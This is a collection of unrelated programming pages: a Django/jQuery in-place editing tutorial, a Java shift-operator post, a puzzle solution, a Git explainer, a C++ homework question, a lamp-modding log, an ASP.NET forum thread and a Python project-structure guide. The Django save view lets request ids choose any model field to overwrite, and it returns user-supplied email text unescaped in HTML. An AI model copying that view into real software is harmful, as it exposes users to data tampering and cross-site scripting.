The following fields are presently only displayed. The Reports to field should be autocomplete based. The Start date field might well enough be left alone as a field that should not need to be updated, or for demonstration purposes it could be set to a jQuery UI datepicker, which would presumably need to have Ajax saving functionality added.

    <p>Reports to:
        <strong>
            {{ entity.reports_to.name }}
        </strong>
    </p>
    <p>Start date:
        <strong>
            {{ entity.start_date }}
        </strong>
    </p>
    {% endblock body_main %}

Page-specific JavaScript

The page-specific JavaScript follows. The first few lines enable the edit, edit_rightclick, and edit_textarea CSS classes to have in-place editing:

    {% block footer_javascript_page %}
    <script language="JavaScript" type="text/javascript">
    <!--
    function register_editables()
    {
        $(".edit").editable("/ajax/save",
            {
            cancel: "Cancel",
            submit: "OK",
            tooltip: "Click to edit.",
            });
        $(".edit_rightclick").editable("/ajax/save",
            {
            cancel: "Cancel",
            submit: "OK",
            tooltip: "Right click to edit.",
            event: "contextmenu",
            });
        $(".edit_textarea").editable("/ajax/save",
            {
            cancel: "Cancel",
            submit: "OK",
            tooltip: "Click to edit.",
            type: "textarea",
            });
    }
    $(function()
    {
        register_editables();
    });
    // -->
    </script>
    {% endblock footer_javascript_page %}

Support on the server-side

This function provides a rather unadorned logging of changes.
This could be expanded to logging in a form intended for machine parsing, display in views, and so on. In functions.py:

    import os
    import time

    import directory.settings

    def log_message(message):
        log_file = os.path.join(os.path.dirname(__file__),
            directory.settings.LOGFILE)
        open(log_file, u'a').write(u"%s: %s\n" % (time.asctime(), message))

In settings.py, after the DATABASE_PORT is set:

    # Relative pathname for user changes logfile for directory
    LOGFILE = u'log'

In the urlpatterns in urls.py:

    (ur'^ajax/save', views.save),
    (ur'^profile/(\d+)$', views.profile),

In views.py, our import section has grown to the following:

    from django.contrib.auth import authenticate, login
    from django.contrib.auth.decorators import login_required
    from django.core import serializers
    from django.db.models import get_model
    from django.http import HttpResponse
    from django.shortcuts import render_to_response
    from django.template import Context, Template
    from django.template.defaultfilters import escape
    from django.template.loader import get_template
    from directory.functions import ajax_login_required
    import directory.models
    import json
    import re

In views.py proper, we define a profile view, with the regular @login_required decorator. (We use @ajax_login_required for views that return JSON or other data for Ajax requests, and @login_required for views that return a full web page.)

    @login_required
    def profile(request, id):
        entity = directory.models.Entity.objects.get(pk = id)
        emails = directory.models.EntityEmail.objects.filter(
            entity__exact = id).all()
        return HttpResponse(get_template(u'profile.html').render(Context(
            {u'entity': entity, u'emails': emails})))

The following view saves changes made via in-place edits:

    @ajax_login_required
    def save(request):
        try:
            html_id = request.POST[u'id']
            value = request.POST[u'value']
        except:
            html_id = request.GET[u'id']
            value = request.GET[u'value']
        if not re.match(ur'^\w+$', html_id):
            raise Exception(u'Invalid HTML id.')

First we test, specifically, for whether a new e-mail is being added.
The last parsed token in that case will be the ID of the Entity the e-mail address is for.

        match = re.match(ur'EntityEmail_new_(\d+)', html_id)
        if match:
            model = int(match.group(1))

We create and save the new EntityEmail instance:

            entity = directory.models.Entity.objects.get(pk = model)
            email = directory.models.EntityEmail(entity = entity,
                email = value)
            email.save()

We log what we have done and, for a view servicing Jeditable Ajax requests, return the HTML that is to be displayed. In this case we return a new link, and re-run the script that applies in-place edit functionality to all appropriate classes, as dynamically added content will not have this happen automatically. Our motive is that people will sometimes hit Save and then realize they made a mistake they want to correct, and we need to handle this as gracefully as the case where the in-place edit is perfect on the first try. We escape for display:

            directory.functions.log_message(u'EntityEmail for Entity (' +
                str(model) + u') added by: ' + request.user.username +
                u', value: ' + value + u'\n')
            return HttpResponse(
                u'<a class="edit_rightclick" id="EntityEmail_email_' +
                str(email.id) + u'" href="mailto:' + value + u'">' +
                value + u'</a>' +
                u'''<span class="edit" id="EntityEmail_new_%s">
                Click to add email.</span>''' % str(email.id))

The else clause is the normal case. First it parses the model, field, and id:

        else:
            match = re.match(ur'^(.*?)_(.*)_(\d+)$', html_id)
            model = match.group(1)
            field = match.group(2).lower()
            id = int(match.group(3))

Then it looks up the selected model (under the directory module, rather than anywhere), finds the instance having this ID, sets the instance's field value, and saves the instance. The solution is generic, and does the usual job that would be done by code like entity.name = new_name.

            selected_model = get_model(u'directory', model)
            instance = selected_model.objects.get(pk = id)
            setattr(instance, field, value)
            instance.save()

Finally, we log the change and return the HTML to display, in this case simply the value.
As with previous examples, we escape the output against injection attacks:

            directory.functions.log_message(model + u'.' + field + u'(' +
                str(id) + u') changed by: ' + request.user.username +
                u' to: ' + value + u'\n')
            return HttpResponse(escape(value))

Summary

We have now gone from a basic foundation to continuing practical application. We have seen how to divide the labor between the client side and the server side. We used this to make a profile page in an employee directory where clicking on text that can be edited enables in-place editing, and we have started to look at usability concerns.

More specifically, we have covered how to use a jQuery plugin, in our case Jeditable, in a solution for Ajax in-place editing. We saw how to use Jeditable in slightly different ways to more appropriately accommodate editable plain text and editable e-mail/URL links. We discussed the server-side responsibilities, including a generic solution for which a naming convention is required. We looked at an example of customizing behavior when we want something more closely tailored to specific cases (which often is part of solving usability problems well), and also how a detailed profile page can be put together.
https://www.packtpub.com/books/content/django-javascript-integration-jquery-place-editing-using-ajax
One of the (many?) shortcomings of Java is, at least in my humble opinion, the lack of unsigned integers. This may seem a minor problem, but it becomes a real annoyance when you have to deal with bits and bytes.

Consider the right shift. As a good C/C++ programmer you know that right shifting of a signed integer is generally bad. Java defines two bit-wise right shift operators: >> and >>>. The first extends the sign, so that -2 >> 1 evaluates to -1, while -2 >>> 1 evaluates to (-1 & 0x7FFFFFFF), i.e. the largest positive int.

So far, so good. So you may be surprised by the result of the following code:

    class Surprise {
        public static void main( String[] args ) {
            int result = -1 >>> 32;
            System.out.println( "surprise: "+result );
        }
    }

I don't want to spoil the result, so you may want to take some more time to think…

Ready with your guess? Well, Surprise.java prints -1. That's because the right hand side argument of the >>> operator is implicitly masked by 0x1F (i.e. taking values just between 0 and 31 included). No warning is emitted during compilation, so you are pretty much on your own: either you know or you don't, and troubles are ready to… byte you.

2 thoughts on "Java Magic Trick"

Andrea says:
Get back to Scala 😛

max says:

    object Surprise {
        def main( arg: Array[String] ) : Unit = {
            val result = -1 >>> 32
            println( s"Surprise: $result" )
        }
    }

Scala is no better in this regard. (Hiding the kinks of the language under a library is an old trick to overcome the limitation of the language 🙂 ) Beside, I'm using Scala on a daily basis.
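The masking rule described in the post can be checked directly (the class name below is mine): for int shifts only the low five bits of the shift count are used, and for long shifts the low six bits.

```java
// Demonstrates that the shift count of an int shift is taken modulo 32,
// and the shift count of a long shift is taken modulo 64.
public class ShiftMask {
    public static void main(String[] args) {
        System.out.println(-1 >>> 32);  // 32 & 0x1F == 0, so this prints -1
        System.out.println(-1 >>> 33);  // 33 & 0x1F == 1, so this prints 2147483647
        System.out.println(-1L >>> 64); // 64 & 0x3F == 0, so this prints -1
    }
}
```

This is why the compiler stays silent: the behaviour is fully defined by the language, just not what a C programmer's intuition expects.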
https://www.maxpagani.org/2019/03/24/java-magic-trick/
The Japanese language is notorious for its sentence ending particles. Personal preference for such particles can be considered a reflection of the speaker's personality. Such a preference is called "Kuchiguse" and is often exaggerated artistically in Anime and Manga. For example, the artificial sentence ending particle "nyan~" is often used as a stereotype for characters with a cat-like personality.

Now given a few lines spoken by the same character, can you find her Kuchiguse?

Each input file contains one test case. For each case, the first line is an integer N (2≤N≤100). Following are N file lines of 0~256 (inclusive) characters in length, each representing a character's spoken line. The spoken lines are case sensitive.

For each test case, print in one line the kuchiguse of the character, i.e., the longest common suffix of all N lines. If there is no such suffix, write nai.

Sample Input 1:
3
Itai nyan~
Ninjin wa iyadanyan~
uhhh nyan~

Sample Output 1:
nyan~

Sample Input 2:
3
Itai!
Ninjinnwaiyada T_T
T_T

Sample Output 2:
nai

    #include <bits/stdc++.h>
    using namespace std;

    vector<string> v;

    int main()
    {
        int n;
        scanf("%d\n", &n);  // note: consume the trailing newline too, so getline works
        int shortest = 500;
        string s;
        for (int i = 0; i < n; i++)
        {
            getline(cin, s);
            if ((int)s.size() < shortest)
                shortest = s.size();
            reverse(s.begin(), s.end());  // reversing turns the common suffix into a common prefix
            v.push_back(s);
        }
        bool right;
        int index = 0;
        for (int i = 0; i < shortest; i++)
        {
            char ch = v[0][i];
            right = true;
            for (int j = 1; j < n; j++)
            {
                if (v[j][i] != ch)
                {
                    right = false;
                    break;
                }
            }
            if (right)
                index++;
            else
                break;
        }
        if (index == 0)
            cout << "nai";
        else
            for (int i = index - 1; i >= 0; i--)  // print the matched prefix back in original order
                cout << v[0][i];
        return 0;
    }
http://www.voidcn.com/article/p-vkcgxbog-bza.html
I am having some difficulty understanding how to use tags versus branches in Git. In what situations should I be using one versus the other?

Tags are refs that point to specific points in the Git history. Tagging is usually used to capture a point in history that is used for a marked version release (i.e. v1.0.1). A tag is sort of a branch that does not change. Unlike branches, tags, once created, don't accumulate any further history of commits.

From a technical point of view:

- tags reside in the refs/tags/ namespace and can point to tag objects (annotated and optionally GPG-signed tags) or to commit objects (the less used lightweight tags for local names), or in very rare cases even to tree objects or blob objects (e.g. a GPG signature).
- branches reside in the refs/heads/ namespace and may point only to commit objects. The HEAD pointer should refer to a branch (a symbolic reference) or to a commit (a detached HEAD, or anonymous branch).
- remote-tracking branches reside in the refs/remotes/<remote>/ namespace and follow ordinary branches in a remote repository.
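A quick sketch in a throwaway repository shows where each kind of ref lives (paths and names below are arbitrary):

```shell
#!/bin/sh
# Create a throwaway repo with one commit, then add a branch and a tag,
# and inspect the ref namespaces they land in.
set -e
dir=$(mktemp -d)
cd "$dir"
git init -q
git -c user.email=demo@example.com -c user.name=demo \
    commit -q --allow-empty -m "first commit"

git branch work   # a movable ref under refs/heads/
git tag v1.0.1    # a fixed ref under refs/tags/

git show-ref      # lists refs/heads/... and refs/tags/v1.0.1
```

New commits made on `work` move `refs/heads/work` forward, while `refs/tags/v1.0.1` keeps pointing at the same commit forever (unless you delete and recreate it).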
https://intellipaat.com/community/21601/git-tag-vs-branch-how-is-a-tag-different-from-a-branch-in-git-which-should-i-use-here
Hello everyone. I've just started University and had a C++ assignment due 2 days ago, so I've already lost 20% of my marks. Basically I've hit a roadblock and can't figure out how to use array values in an equation.

The program needs to calculate the total resistance (r) of a parallel circuit. It needs to prompt the user for the value of resistor 1, then resistor 2, then resistor 3, and store those values in an array of size 3 (assignment criteria). I've got the array working, however I need to use the array values in an equation and no matter what I try it won't work.

So the program needs to do this:

Enter R1:
Enter R2:
Enter R3:
Total resistance = 1/R1+1/R2+1/R3. Answer = total resistance.

Here's the coding; as you can see I haven't done much so far. I've tried many different things, even using r = 1/[0]+1/[1]+1/[2]. I have no idea why that doesn't work.

Code:
    #include <iostream>
    using namespace std;
    int main()
    {
        int myArray[3]; //Array of 3 integars
        int i;
        for (i=0;i<3;i++) //0-3
        {
            cout << "Enter the value of R" << i+1 << ": ";
            cin >> myArray[i];
        }
        int r, r1, r2, r3;
        myArray[0] = r1;
        myArray[1] = r2;
        myArray[2] = r3;
        cout <<r1<<"";
        /*r = 1/r1+1/r2+1/r3;
        cout << r;*/
        system("pause");
        return 0;
    }

That's my coding so far and it doesn't work properly: it prompts for the resistor values correctly, then displays the answer, however the answer is not even close to being correct. Can anyone please tell me what I'm doing wrong?
http://cboard.cprogramming.com/cplusplus-programming/114582-desperate-help-needed-cplusplus-uni-assignment.html
Modding a silicone cat lamp to have a nicer rainbow fade.

First I wrote some simple C programs that made sure that all the connections to the LEDs worked, and a little program that displayed one color when the sensor value is low and another when it is high. I already put parts of different concern into separate C files for later convenience.

I wanted to keep the functionality that beating the cat changes the mode. This results in a very simple state machine, with the sensor pin going low and high again as the only type of transition. I made that into an enum variable which is incremented in an interrupt service function.

The problem in the first place was the need for smooth color transitions. To accomplish that I went for an implementation of a sinusoidal HSB fade. To do that on an ATtiny in a fast and efficient manner I chose to use a lookup table, which I generated with Python. Because right now I am only doing 8-bit software PWM, I chose an amplitude of 255.

    from math import cos, pi

    LUT_LEN = 512
    LUT_AMP = 2**8 - 1

    lut = [int(cos(i*pi/2/LUT_LEN)*LUT_AMP) for i in range(0, LUT_LEN)]
    print(lut)

The printout can be copy-pasted into C code. The result right now looks like this. The stripes can of course only be seen on camera, due to aliasing.

The original controller gets the charge status (charging or not charging) via a pin and accordingly makes an LED blink. The substitution for that is a wire bridging the ingoing and outgoing pins, resulting in the charge status LED glowing while the cat charges.

Because the original controller has no IC markings and I couldn't determine the type, I decided to desolder it and replace it with an ATtiny85. I soldered the DIP-8 version of this controller onto a double-sided prototyping board, and filled and wired the holes in the middle in a way that lets me program it with pogo pins. Then I hot glued it onto a place on the PCB where the LEDs wouldn't cast a shadow.
The last step was to wire the power traces to the power pins, the RGBW traces to PB0..3, and the sensor trace to PB4. The cat is an LED lamp with a lithium battery cell that is charged via a micro USB port. With the push of a button next to the micro USB port, the cat can be turned on and off. By beating the body or the base of the cat, the mode is changed. The modes are "warm white light on", "RGB color steps", and "LEDs off". The color steps are very annoying, and the goal of this project was to replace them with pleasant color fading. In the base of the lamp is the main PCB, which is single-sided and holds basic components for battery charging and protection, the main IC which does all the smarts, some analog circuitry for the "beating sensor", transistors and resistors for the LEDs, and the LEDs themselves - four warm white ones and four RGB ones. Each color is connected in parallel. The beating sensor is a piezo element which is held in the middle of the base. Under the main PCB are the battery and an interfacing PCB, which is connected via a 4-lead cable and holds the USB port, a switch, and an LED which blinks while charging. The main IC does everything. It has contacts going in for the power, the charge status, and the sensor, and going out for the four colors and the charging status LED. Some pins are not used. Here you can see the footprint after removal and cleanup. In the picture, the upper left pin is pin 1.
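For reference, the quarter-wave table above only covers 0..π/2; mirroring it yields a full sinusoidal fade curve. Here is a Python sketch of that mirroring (the `fade_level` helper is my own illustration of the idea; the real firmware would do the equivalent in C):

```python
from math import cos, pi

# Regenerate the quarter-cosine table from the snippet above.
LUT_LEN = 512
LUT_AMP = 2**8 - 1
lut = [int(cos(i * pi / 2 / LUT_LEN) * LUT_AMP) for i in range(LUT_LEN)]

def fade_level(phase):
    """Map a phase (0 .. 4*LUT_LEN-1) to a PWM duty of 0..255 by
    mirroring the quarter wave into a full cosine period."""
    quadrant, idx = divmod(phase % (4 * LUT_LEN), LUT_LEN)
    if quadrant == 0:
        half = lut[idx]                   # +255 -> 0
    elif quadrant == 1:
        half = -lut[LUT_LEN - 1 - idx]    # 0 -> -255
    elif quadrant == 2:
        half = -lut[idx]                  # -255 -> 0
    else:
        half = lut[LUT_LEN - 1 - idx]     # 0 -> +255
    return (half + LUT_AMP) // 2          # shift into the 0..255 duty range
```

Storing only a quarter of the wave keeps the table small enough for an ATtiny's flash while still giving a smooth full-period fade.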
https://hackaday.io/project/27415-blinkencat
darkknight187 (Participant, May 25, 2009, 11:01 AM):

The stored procedure is part of it, but there are several other steps. I think you were trying this in the main membership database; I would use the members table in the classifieds database. I'm quoting off the top of my head, so it could be wrong, but it should get you on the right track.

First off, you need to make a backup of your project, just in case you screw up. Then, in the classifieds database, add a column named comment to the members table. I would set the new column as nvarchar(100); the 100 limits the number of characters that can be inserted into the database. Add the column to the insert-member stored procedure. Then add it to App_Code/BLL/Members (in the insert-member section); it should be set as string if you used nvarchar. Take note of where you put comment in the parameter order - it's very important in the next step, and you will see an error until you complete it. Open App_Code/DAL/members and add comment to the list. Make sure you change the properties too; just compare to the others, and enter 100 for the maximum characters here as well. Still in the last file, right-click on the background and choose View Code. Scroll down to the insert-members section and add comment to it; here's where the order is important. And of course, add it to your register and myprofile pages. Make sure you test what happens if the user registers without adding a comment - does that cause errors when viewed in myprofile? If so, you should add a default on the register page.

Good Luck
-Daniel

tomehhh (May 26, 2009, 06:21 AM):

Hi,

In the aspnet_Membership table there is already a field named Comment - I would like to use that field. I have modified the stored procedure aspnet_Membership_CreateUser, and here is the error I get:

Procedure or function 'aspnet_Membership_CreateUser' expects parameter '@Comment', which was not supplied.
Here is the stored procedure (I have modified the order of fields in the aspnet_Membership table so the Comment field comes after PasswordAnswer; wherever PasswordAnswer is mentioned, I have added the Comment field below it):

ALTER PROCEDURE dbo.aspnet_Membership_CreateUser
    @ApplicationName  nvarchar(256),
    @UserName         nvarchar(256),
    @Password         nvarchar(128),
    @PasswordSalt     nvarchar(128),
    @PasswordQuestion nvarchar(256),
    @PasswordAnswer   nvarchar(128),
    @Comment          ntext,

Thanks.
T

Spider Master (Participant, 845 Points, May 27, 2009, 08:37 AM):

Hello again :D

I think your approach is a little off course (headed in the wrong direction). With the default ASP.NET membership database, I would recommend never modifying it until you understand it well. The database is used by the ASP.NET server through pre-established code that can be overridden at run time; however, the functionality of inserting a comment into the users table is already provided via MembershipUser. I would suggest rolling back to the original stored procedure and using the MembershipUser class with its update methods to add in your comment.

Hope this helps
https://forums.asp.net/t/1427189.aspx?adding+Comment+field+to+Register+aspx+and+to+MyProfile+aspx+page
The worst part of tutorials is always their simplicity, isn't it? Rarely will you find one with more than one file, far more seldom with multiple directories. I've found that structuring a Python project is one of the most often overlooked components of teaching the language. Worse, many developers get it wrong, stumbling through a jumble of common mistakes until they arrive at something that at least works. Here's the good news: you don't have to be one of them! In this installment of the Dead Simple Python series, we'll be exploring import statements, modules, packages, and how to fit everything together without tearing your hair out. We'll even touch on VCS, PEP, and the Zen of Python. Buckle up!

Setting Up The Repository

Before we delve into the actual project structure, let's address how this fits into our Version Control System [VCS]...starting with the fact that you need a VCS! A few reasons are...

- Tracking every change you make,
- Figuring out exactly when you broke something,
- Being able to see old versions of your code,
- Backing up your code, and
- Collaborating with others.

You've got plenty of options available to you. Git is the most obvious, especially if you don't know what else to use. You can host your Git repository for free on GitHub, GitLab, Bitbucket, or Gitote, among others. If you want something other than Git, there are dozens of other options, including Mercurial, Bazaar, and Subversion (although if you use that last one, you'll probably be considered something of a dinosaur by your peers).

I'll be quietly assuming you're using Git for the rest of this guide, as that's what I use exclusively.

Once you've created your repository and cloned a local copy to your computer, you can begin setting up your project. At minimum, you'll need to create the following:

- README.md: A description of your project and its goals.
- LICENSE.md: Your project's license, if it's open source. (See opensource.org for more information about selecting one.)
- .gitignore: A special file that tells Git what files and directories to ignore. (If you're using another VCS, this file has a different name. Look it up.)
- A directory with the name of your project.

That's right...our Python code files actually belong in a separate subdirectory! This is very important, as our repository's root directory is going to get mighty cluttered with build files, packaging scripts, virtual environments, and all manner of other things that aren't actually part of the source code. Just for the sake of example, we'll call our fictional project awesomething.

PEP 8 and Naming

Python style is governed largely by a set of documents called Python Enhancement Proposals, abbreviated PEP. Not all PEPs are actually adopted, of course - that's why they're called "Proposals" - but some are. You can browse the master PEP index on the official Python website. This index is formally referred to as PEP 0.

Right now, we're mainly concerned with PEP 8, first authored by the Python language creator Guido van Rossum back in 2001. It is the document which officially outlines the coding style all Python developers should generally follow. Keep it under your pillow! Learn it, follow it, encourage others to do the same. (Side note: PEP 8 makes the point that there are always exceptions to style rules. It's a guide, not a mandate.)

Right now, we're chiefly concerned with the section entitled "Package and Module Names"...

Modules should have short, all-lowercase names. Underscores can be used in the module name if it improves readability. Python packages should also have short, all-lowercase names, although the use of underscores is discouraged.

We'll get to what exactly modules and packages are in a moment, but for now, understand that modules are named by filenames, and packages are named by their directory name. In other words, filenames should be all lowercase, with underscores if that improves readability.
Similarly, directory names should be all lowercase, without underscores if at all avoidable. To put that another way...

- Do this: awesomething/data/load_settings.py
- NOT this: awesomething/Data/LoadSettings.py

I know, I know, a long-winded way to make a point, but at least I put a little PEP in your step. (Hello? Is this thing on?)

Packages and Modules

This is going to feel anticlimactic, but here are those promised definitions: any Python (.py) file is a module, and a bunch of modules in a directory is a package.

Well...almost. There's one other thing you have to do to a directory to make it a package, and that's to stick a file called __init__.py into it. You actually don't have to put anything into that file. It just has to be there. There is other cool stuff you can do with __init__.py, but it's beyond the scope of this guide, so go read the docs to learn more.

If you do forget __init__.py in your package, it's going to do something much weirder than just failing, because that makes it an implicit namespace package. There are some nifty things you can do with that special type of package, but I'm not going into that here. As usual, you can learn more by reading the documentation: PEP 420: Implicit Namespace Packages.

So, if we look at our project structure, awesomething is actually a package, and it can contain other packages. Thus, we might call awesomething our top-level package, and all the packages underneath it our subpackages. This is going to be really important once we get to importing stuff.

Let's look at a snapshot of one of my real-world projects, omission, to get an idea of how we're structuring stuff...

omission-git
├── omission
│   ├── common
│   ├── data
│   ├── game
│   ├── resources
│   └── tests
└── README.md

(In case you're wondering, I used the UNIX program tree to make that little diagram above.) You'll see that I have one top-level package called omission, with four subpackages: common, data, game, and tests. I also have the directory resources, but that only contains game audio, images, etc. (omitted here for brevity).
resources is NOT a package, as it doesn't contain an __init__.py.

I also have another special file in my top-level package: __main__.py. This is the file that is run when we execute our top-level package directly via python -m omission. We'll talk about what goes in that __main__.py in a bit.

How import Works

If you've written any meaningful Python code before, you're almost certainly familiar with the import statement. For example...

import re

It is helpful to know that, when we import a module, we are actually running it. This means that any import statements in the module are also being run. For example, re.py has several import statements of its own, which are executed when we say import re. That doesn't mean they're available to the file we imported re from, but it does mean those files have to exist. If (for some unlikely reason) enum.py got deleted on your environment, and you ran import re, it would fail with an error...

Traceback (most recent call last):
  File "weird.py", line 1, in <module>
    import re
  File "re.py", line 122, in <module>
    import enum
ModuleNotFoundError: No module named 'enum'

Naturally, reading that, you might get a bit confused. I've had people ask me why the outer module (in this example, re) can't be found. Others have wondered why the inner module (enum here) is being imported at all, since they didn't ask for it directly in their code. The answer is simple: we imported re, and that imports enum.

Of course, the above scenario is fictional: import enum and import re are never going to fail under normal circumstances, because both modules are part of Python's core library. It's just a silly example. ;)

Import Dos and Don'ts

There are actually a number of ways of importing, but most of them should rarely, if ever, be used.
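Incidentally, the claim that importing a module executes it can be demonstrated without touching any real project, by writing a throwaway module at runtime and loading it (this demo is my own illustration, not part of the omission project):

```python
import importlib.util
import tempfile
from pathlib import Path

# Write a throwaway module whose top-level code has a visible side effect.
tmp = Path(tempfile.mkdtemp())
module_path = tmp / "noisy.py"
module_path.write_text("print('noisy module is running!')\nexecuted = True\n")

# Loading the module executes every top-level statement in it,
# including that print() - exactly like a normal import would.
spec = importlib.util.spec_from_file_location("noisy", module_path)
noisy = importlib.util.module_from_spec(spec)
spec.loader.exec_module(noisy)  # prints: noisy module is running!

print(noisy.executed)
```

The same thing happens invisibly every time you write a plain `import` statement; Python just caches the result in `sys.modules` so it only runs once per interpreter session.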
For all of the examples below, we'll imagine that we have a file called smart_door.py:

# smart_door.py
def close():
    print("Ahhhhhhhhhhhh.")

def open():
    print("Thank you for making a simple door very happy.")

Just for example, we will run the rest of the code in this section in the Python interactive shell, from the same directory as smart_door.py.

If we want to run the function open(), we have to first import the module smart_door. The easiest way to do this is...

import smart_door
smart_door.open()
smart_door.close()

We would actually say that smart_door is the namespace of open() and close(). Python developers really like namespaces, because they make it obvious where functions and whatnot are coming from. (By the way, don't confuse namespace with implicit namespace package. They're two different things.)

The Zen of Python, also known as PEP 20, defines the philosophy behind the Python language. The last line has a statement that addresses this:

Namespaces are one honking great idea -- let's do more of those!

At a certain point, however, namespaces can become a pain, especially with nested packages. foo.bar.baz.whatever.doThing() is just ugly. Thankfully, we do have a way around having to use the namespace every time we call the function.

If we want to be able to use the open() function without constantly having to precede it with its module name, we can do this instead...

from smart_door import open
open()

Note, however, that neither close() nor smart_door.close() will work in that last scenario, because we didn't import the function outright. To use it, we'd have to change the code to this...

from smart_door import open, close
open()
close()

In that terrible nested-package nightmare earlier, we can now say from foo.bar.baz.whatever import doThing, and then just use doThing() directly. Alternatively, if we want a LITTLE bit of namespace, we can say from foo.bar.baz import whatever, and say whatever.doThing().
The import system is deliciously flexible like that.

Before long, though, you'll probably find yourself saying "But I have hundreds of functions in my module, and I want to use them all!" This is the point at which many developers go off the rails, by doing this...

from smart_door import *

This is very, very bad! Simply put, it imports everything in the module directly, and that's a problem. Imagine the following code...

from smart_door import *
from gzip import *
open()

What do you suppose will happen? The answer is, gzip.open() will be the function that gets called, since that's the last version of open() that was imported, and thus defined, in our code. smart_door.open() has been shadowed - we can't call it as open(), which means we effectively can't call it at all.

Of course, since we usually don't know, or at least don't remember, every single function, class, and variable in every module that gets imported, we can easily wind up with a whole lot of messes. The Zen of Python addresses this scenario as well...

Explicit is better than implicit.

You should never have to guess where a function or variable is coming from. Somewhere in the file should be code that explicitly tells us where it comes from. The first two scenarios demonstrate that.

I should also mention that the earlier foo.bar.baz.whatever.doThing() scenario is something Python developers do NOT like to see. Also from the Zen of Python...

Flat is better than nested.

Some nesting of packages is okay, but when your project starts looking like an elaborate set of Matryoshka dolls, you've done something wrong. Organize your modules into packages, but keep it reasonably simple.

Importing Within Your Project

That project file structure we created earlier is about to come in very handy. Recall my omission project. In my game_round_settings module, defined by omission/data/game_round_settings.py, I want to use my GameMode class. That class is defined in omission/common/game_enums.py. How do I get to it?
Because I defined omission as a package, and organized my modules into subpackages, it's actually pretty easy. In game_round_settings.py, I say...

from omission.common.game_enums import GameMode

This is called an absolute import. It starts at the top-level package, omission, and walks down into the common package, where it looks for game_enums.py.

Some developers come to me with import statements more like from common.game_enums import GameMode, and wonder why it doesn't work. Simply put, the data package (where game_round_settings.py lives) has no knowledge of its sibling packages. It does, however, know about its parents. Because of this, Python has something called relative imports that lets us do the same thing like this instead...

from ..common.game_enums import GameMode

The .. means "this package's direct parent package", which in this case, is omission. So, the import steps back one level, walks down into common, and finds game_enums.py.

There's a lot of debate about whether to use absolute or relative imports. Personally, I prefer to use absolute imports whenever possible, because it makes the code a lot more readable. You can make up your own mind, however. The only important part is that the result is obvious - there should be no mystery where anything comes from. (Continued reading: Real Python - Absolute vs Relative Imports in Python.)

There is one other lurking gotcha here! In omission/data/settings.py, I have this line:

from omission.data.game_round_settings import GameRoundSettings

Surely, since both these modules are in the same package, we should be able to just say from game_round_settings import GameRoundSettings, right? Wrong! It will actually fail to locate game_round_settings.py. This is because we are running the top-level package omission, which means the search path (where Python looks for modules, and in what order) works differently.
However, we can use a relative import instead:

from .game_round_settings import GameRoundSettings

In that case, the single . means "this package".

If you're familiar with the typical UNIX file system, this should start to make sense. .. means "back one level", and . means "the current location". Of course, Python takes it one step further: ... means "back two levels", .... is "back three levels", and so forth. However, keep in mind that those "levels" aren't just plain directories here. They're packages. If you have two distinct packages in a plain directory that is NOT a package, you can't use relative imports to jump from one to another. You'll have to work with the Python search path for that, and that's beyond the scope of this guide. (See the docs at the end of this article.)

__main__.py

Remember when I mentioned creating a __main__.py in our top-level package? That is a special file that is executed when we run the package directly with Python. My omission package can be run from the root of my repository with python -m omission. Here's the contents of that file:

from omission import app

if __name__ == '__main__':
    app.run()

Yep, that's actually it! I'm importing my module app from the top-level package omission. Remember, I could also have said from . import app instead. Alternatively, if I wanted to just say run() instead of app.run(), I could have done from omission.app import run or from .app import run. In the end, it doesn't make much technical difference HOW I do that import, so long as the code is readable. (Side note: We could debate whether it's logical for me to have a separate app.py for my main run() function, but I have my reasons...and they're beyond the scope of this guide.)

The part that confuses most folks at first is the whole if __name__ == '__main__' statement. Python doesn't have much boilerplate - code that must be used pretty universally with little to no modification - but this is one of those rare bits.
__name__ is a special string attribute of every Python module. If I were to stick the line print(__name__) at the top of omission/data/settings.py, when that module got imported (and thus run), we'd see "omission.data.settings" printed out.

When a module is run directly via python -m some_module, that module is assigned a special value of __name__: "__main__". Thus, if __name__ == '__main__': is actually checking whether the module is being executed as the main module. If it is, it runs the code under the conditional.

You can see this in action another way. If I added the following to the bottom of app.py...

if __name__ == '__main__':
    run()

...I can then execute that module directly via python -m omission.app, and the results are the same as python -m omission. Now __main__.py is being ignored altogether, and the __name__ of omission/app.py is "__main__". Meanwhile, if I just run python -m omission, that special code in app.py is ignored, since its __name__ is now omission.app again. See how that works?

Wrapping Up

Let's review.

- Every project should use a VCS, such as Git. There are plenty of options to choose from.
- Every Python code file (.py) is a module.
- Organize your modules into packages. Each package must contain a special __init__.py file.
- Your project should generally consist of one top-level package, usually containing sub-packages. That top-level package usually shares the name of your project, and exists as a directory in the root of your project's repository.
- NEVER EVER EVER use * in an import statement. Before you entertain a possible exception, the Zen of Python points out "Special cases aren't special enough to break the rules."
- Use absolute or relative imports to refer to other modules in your project.
- Executable projects should have a __main__.py in the top-level package. Then, you can directly execute that package with python -m myproject.
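The __name__ mechanics above boil down to a single comparison; a tiny sketch (the describe() helper is hypothetical, purely for illustration - it is not from the omission project):

```python
def describe(name):
    """Mirror the branch that `if __name__ == '__main__'` takes."""
    if name == "__main__":
        return "being run directly"
    return "imported as " + name

# A module run via `python -m` sees __name__ == "__main__";
# the same file imported from elsewhere sees its dotted module name.
print(describe("__main__"))      # being run directly
print(describe("omission.app"))  # imported as omission.app
```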
Of course, there are a lot more advanced concepts and tricks we can employ in structuring a Python project, but we won't be discussing that here. I highly recommend reading the docs:

- Python Reference: The import system
- Python Tutorials: Modules
- PEP 8: Style Guide for Python Code
- PEP 20: The Zen of Python
- PEP 420: Implicit Namespace Packages

Thank you to grym, deniska (Freenode IRC #python), @cbrintnall, and @rhymes (Dev) for suggested revisions.

Discussion (53)

Great article, Jason. I cannot figure out a problem; maybe you can share your ideas. I have the following structure: The main entry point is cmake_project_creator/project_creator.py, asking for a couple of parameters. If I try to invoke it from PyCharm, everything is fine. The tests, run by nosetests --with-coverage --cover-erase, run fine. But if I try to invoke cmake_project_creator/project_creator.py from the terminal, this is what I get: Do you have any idea what the issue can be?

Absolutely. Your package needs a dedicated entry point for any imports off cmake_project_creator to work. Add __main__.py to cmake_project_creator/. Your __main__.py file should look something like this: Then, you can invoke the package directly with...

python3 -m cmake_project_creator

Thanks a lot, Jason! This partly solved my problem. Now I can run, for example, python3 -m cmake_project_creator -c, where -c is a parameter, and it works like a charm. But after adding the correct shebang and execution rights, I still cannot simply run ./cmake_project_creator/project_creator.py -c, as I have the same failure: Do I really have to manipulate sys.path for that?

